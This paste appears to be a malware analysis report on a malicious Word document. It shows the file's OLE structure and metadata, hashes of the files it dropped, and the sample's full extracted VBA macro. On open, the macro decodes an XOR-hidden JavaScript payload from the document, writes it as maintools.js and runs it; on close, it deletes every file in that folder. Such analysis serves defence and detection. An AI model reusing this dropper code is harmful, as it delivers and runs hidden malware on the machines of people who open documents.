Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --------------------------------------------------------------------
- Maldoc Hash: 49b367ac261a722a7c2bbbc328c32545
- --------------------------------------------------------------------
- 'Root Entry' (root) 13312 bytes
- {00020906-0000-0000-C000-000000000046}
- '\x01CompObj' (stream) 114 bytes
- '\x05DocumentSummaryInformation' (stream) 284 bytes
- '\x05SummaryInformation' (stream) 392 bytes
- '1Table' (stream) 8017 bytes
- 'Data' (stream) 4096 bytes
- 'Macros' (storage)
- 'PROJECT' (stream) 483 bytes
- 'PROJECTwm' (stream) 65 bytes
- 'VBA' (storage)
- 'Module1' (stream) 7117 bytes
- 'ThisDocument' (stream) 1104 bytes
- '_VBA_PROJECT' (stream) 3467 bytes
- '__SRP_0' (stream) 2964 bytes
- '__SRP_1' (stream) 195 bytes
- '__SRP_2' (stream) 2717 bytes
- '__SRP_3' (stream) 290 bytes
- 'dir' (stream) 565 bytes
- 'ObjectPool' (storage)
- '_1541577328' (storage)
- {0003000C-0000-0000-C000-000000000046}
- '\x01CompObj' (stream) 76 bytes
- '\x01Ole10Native' (stream) 20301 bytes
- '\x03EPRINT' (stream) 5000 bytes
- '\x03ObjInfo' (stream) 6 bytes
- 'WordDocument' (stream) 133755 bytes
- ['\x05DocumentSummaryInformation']: properties
- 1 1252
- 5 15
- 6 4
- 11 False
- 12 None
- 13 None
- 15 b'Olymp'
- 16 False
- 17 2144
- 19 False
- 22 False
- 23 917504
- ['\x05SummaryInformation']: properties
- 1 1252
- 2 b''
- 3 b''
- 4 b'user'
- 5 b''
- 7 b'Normal.dotm'
- 8 b'John'
- 9 b'11'
- 10 1601-01-01 00:08:00
- 12 2016-11-25 19:04:00
- 13 2016-11-25 20:04:00
- 14 1
- 15 320
- 16 1828
- 18 b'Microsoft Office Word'
- 19 0
- Modification/Creation times of all directory entries:
- - Root Entry: mtime=2016-11-25 20:04:23.969000 ctime=None
- - Data: mtime=None ctime=None
- - WordDocument: mtime=None ctime=None
- - ObjectPool: mtime=2016-11-25 20:04:23.969000 ctime=2016-11-25 20:04:23.694000
- - _1541577328: mtime=2016-11-25 20:04:23.694000 ctime=2016-11-25 20:04:23.694000
- - EPRINT: mtime=None ctime=None
- - CompObj: mtime=None ctime=None
- - ObjInfo: mtime=None ctime=None
- - Ole10Native: mtime=None ctime=None
- - 1Table: mtime=None ctime=None
- - SummaryInformation: mtime=None ctime=None
- - DocumentSummaryInformation: mtime=None ctime=None
- - Macros: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
- - VBA: mtime=2016-11-25 20:04:23.696000 ctime=2016-11-25 20:04:23.696000
- - dir: mtime=None ctime=None
- - Module1: mtime=None ctime=None
- - __SRP_0: mtime=None ctime=None
- - __SRP_1: mtime=None ctime=None
- - __SRP_2: mtime=None ctime=None
- - __SRP_3: mtime=None ctime=None
- - ThisDocument: mtime=None ctime=None
- - _VBA_PROJECT: mtime=None ctime=None
- - PROJECT: mtime=None ctime=None
- - PROJECTwm: mtime=None ctime=None
- - CompObj: mtime=None ctime=None
- Properties from SummaryInformation stream:
- - codepage: 1252
- - title: b''
- - subject: b''
- - author: b'user'
- - keywords: b''
- - comments: None
- - template: b'Normal.dotm'
- - last_saved_by: b'John'
- - revision_number: b'11'
- - total_edit_time: 480
- - last_printed: None
- - create_time: datetime.datetime(2016, 11, 25, 19, 4)
- - last_saved_time: datetime.datetime(2016, 11, 25, 20, 4)
- - num_pages: 1
- - num_words: 320
- - num_chars: 1828
- - thumbnail: None
- - creating_application: b'Microsoft Office Word'
- - security: 0
- Properties from DocumentSummaryInformation stream:
- - codepage_doc: 1252
- - category: None
- - presentation_target: None
- - bytes: None
- - lines: 15
- - paragraphs: 4
- - slides: None
- - notes: None
- - hidden_slides: None
- - mm_clips: None
- - scale_crop: False
- - heading_pairs: None
- - titles_of_parts: None
- - manager: None
- - company: b'Olymp'
- - links_dirty: False
- - chars_with_spaces: 2144
- - unused: None
- - shared_doc: False
- - link_base: None
- - hlinks: None
- - hlinks_changed: False
- - version: 917504
- - dig_sig: None
- - content_type: None
- - content_status: None
- - language: None
- - doc_version: None
- Root entry name: "Root Entry"
- This is a Word document.
- type of stream 'WordDocument': 2
- size : 133755
- ---------------------------------------------------------------------
- maintools.js EzZETcSXyKAdF_e5I2i1
- ----------------------------------------------------------------------
- Package Name : picture.jpg
- Package Name Unicode : picture.jpg
- Original File Path : C:\Users\John\Pictures\picture.jpg
- Original File Path Unicode : C:\Users\John\Pictures\picture.jpg
- Save File Path : C:\Users\John\AppData\Local\Temp\picture.jpg
- Save File Path Unicode : C:\Users\John\AppData\Local\Temp\picture.jpg
- Content Size : 19.53 KB
- Content : 91d8907e81b02b72a82e14d57dc26aff
- -------------------------------------------------------------------------
- Public OBKHLrC3vEDjVL As String
- Public B8qen2T433Ds1bW As String
- Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
- Dim THQNfU76nlSbtJ5nX8LY6 As Byte
- THQNfU76nlSbtJ5nX8LY6 = 45
- For i = 0 To M5wI32R3VF2g5B21EK4d - 1
- EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
- THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
- Next i
- Q7JOhn5pIl648L6V43V = True
- End Function
- Sub AutoClose()
- On Error Resume Next
- Kill OBKHLrC3vEDjVL
- On Error Resume Next
- Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
- R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
- Set R7Ks7ug4hRR2weOy7 = Nothing
- End Sub
- Sub AutoOpen()
- On Error GoTo MnOWqnnpKXfRO
- Dim NEnrKxf8l511
- Dim N18Eoi6OG6T2rNoVl41W As Long
- Dim M5wI32R3VF2g5B21EK4d As Long
- N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
- NEnrKxf8l511 = FreeFile
- Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
- Dim E2kvpmR17SI() As Byte
- ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
- Get #NEnrKxf8l511, 1, E2kvpmR17SI
- Dim KqG31PcgwTc2oL47hjd7Oi As String
- KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
- Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
- Dim VUy5oj112fLw51h6S
- Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
- VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
- Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
- Dim Y5t4Ul7o385qK4YDhr
- If I4j833DS5SFd34L3gwYQD.Count = 0 Then
- GoTo MnOWqnnpKXfRO
- End If
- For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
- Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
- Exit For
- Next
- Dim Wk4o3X7x1134j() As Byte
- Dim KDXl18qY4rcT As Long
- KDXl18qY4rcT = 16827
- ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
- Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
- If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
- GoTo MnOWqnnpKXfRO
- End If
- B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
- Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
- If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
- B8qen2T433Ds1bW = Environ("appdata")
- End If
- Set R7Ks7ug4hRR2weOy7 = Nothing
- Dim K764B5Ph46Vh
- K764B5Ph46Vh = FreeFile
- OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
- Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
- Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
- Close #K764B5Ph46Vh
- Erase Wk4o3X7x1134j
- Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
- R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
- ActiveDocument.Save
- Exit Sub
- MnOWqnnpKXfRO:
- Close #K764B5Ph46Vh
- ActiveDocument.Save
- End Sub
- --------------------------------------------------
- Malware Drop:
- --------------------------------------------------
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C07F9B5.emf
- File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
- MD5: EB10732AA3F3BB122DC9452917A62FA1
- SHA1: 19EE431B257833CBCA0868DCA5BCE19A81205DC5
- SHA-256: 750987BD6026CC8C515D0B6D65FFBE5BCBF7824EE56E82128D220EEF86390874
- SHA-512: 6043E5CA7627CED98A2785E2E103D2735E588DA0BA7ABA64FA9906ACB5505C4EFCF4D02F44A8C3B506C14D8AB4955192C49EAEF23A250AB287A581B3254C7C36
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61B24A8B.emf
- File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
- MD5: FDBBE99A5DD164B403945E6A98434CC1
- SHA1: 16A5869904B7A7C54B0262B1B83B5C4B36F581EB
- SHA-256: D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
- SHA-512: 6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C92CC32.emf
- File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
- MD5: FDBBE99A5DD164B403945E6A98434CC1
- SHA1: 16A5869904B7A7C54B0262B1B83B5C4B36F581EB
- SHA-256: D416447FB0A6AA8F66CB9C943B7FFDA365CE56D2AD8AC12AC0154EF8A52D1CA0
- SHA-512: 6A608C28D41A9A09E4E0B9BE8E3EFC88BAAD44D0F92708176FB76B9900F46AC3D3F4C9C45D0A694D028F129085EBE8B2C2A80EB9308799B6403C69178CE3A83B
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{570A205C-645C-4995-BCAD-8D4566A2D524}.tmp
- File Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5: 5D4D94EE7E06BBB0AF9584119797B23A
- SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
- SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
- SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
- C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B98AD5AC-9AA1-42F5-81F6-596A6B184300}.tmp
- File Type: data
- MD5: 2395DEC0A691F71650A4095EB5E05A34
- SHA1: 56903ED3513DAE0E1ABAFF66A2BB97B4D49B9C9E
- SHA-256: EEAD99619FE079B2DBFBF25A674C8D475B37E208AA2CEE428AFC488BC662FD09
- SHA-512: B2DDFEBEB9609F80F9843BC59F6E8B94E3A0F7DC158A6269FEB3199289D3FE784DD820B2B3021F5D24542B11C8E6A9EF29342AFBE8C09D87540FB1F8B87AE5AD
- C:\Users\user\AppData\Local\Microsoft\Windows\maintools.js
- File Type: ASCII text, with very long lines, with CRLF line terminators
- MD5: 5EA3FD094B69E9E00894842F95FD5D85
- SHA1: 318F06FF16CA0FD98FEBE2A777064F0A428163C3
- SHA-256: 3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
- SHA-512: 3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
- Malicious: false
- C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FJv6MQfMYp.LNK
- File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 14:00:27 2017, mtime=Sun Sep 24 14:00:27 2017, atime=Wed Oct 4 14:15:38 2017, length=201216, window=hide
- MD5: 9F3F92427821D76F074286502717BD32
- SHA1: 206DDA573C78EF1900DFAAEFDBD4D82C851AEEA5
- SHA-256: 311F47C14B793048FEE343B45BAF8AB1FD2144B489988C8689AD18F15374AD8A
- SHA-512: 828675605CC6D8460252D92D6423C5202422F8C1A38CCCD31E1EDE402055A2D852E446723E3ACA6A70BE84F2B6FB74A1817D31BE36FC147E5EBF7DC05D4F17CF
- C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
- File Type: ASCII text, with CRLF line terminators
- MD5: 127D8F99975C8FA1D0974D8191BA7A52
- SHA1: 77943D3D71FA1F37C3692A1F38052E87E3BEA892
- SHA-256: 394D91597EF0C448F9D4B843F7DF3F445549FA9EE4B4B65955A8A709FC261AC0
- SHA-512: E24D8C5D8ACB45CAA8A60E2F993BAE0AD8A9D03EE545AE8647DE1404224FE636DFE4EC7A2D84223F773B940CC36F264CFD32EDDB5C7D3DCD8260A1D0CAEAD3A0
- C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
- File Type: data
- MD5: 3E7BD24815610B9CFB276BECD6CE969F
- SHA1: 55D998570D5B808657E7C140888B339F657E15C4
- SHA-256: 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
- SHA-512: 47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5
- C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
- File Type: Little-endian UTF-16 Unicode text, with no line terminators
- MD5: F3B25701FE362EC84616A93A45CE9998
- SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
- SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
- SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
- C:\Users\user\AppData\Roaming\Microsoft\Windows\maintools.js
- File Type: ASCII text, with very long lines, with CRLF line terminators
- MD5: 5EA3FD094B69E9E00894842F95FD5D85
- SHA1: 318F06FF16CA0FD98FEBE2A777064F0A428163C3
- SHA-256: 3A065547ADB0AFC63E318C2FA1F682108664E602934490A898C3DE1B23975628
- SHA-512: 3E406F5965481348F937D5B0E5433486B727D4F782AC4D67E6898949E3F13ADF5DB152127D1635D733CA4AE5E5A0741656F27A350C3A82A2BF4854E8B7831C02
- C:\Users\user\Desktop\~$v6MQfMYp.doc
- File Type: data
- MD5: 3E7BD24815610B9CFB276BECD6CE969F
- SHA1: 55D998570D5B808657E7C140888B339F657E15C4
- SHA-256: 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593
- SHA-512: 47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E1FA62183BAC9C51409F44D219365B94043CBC5
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement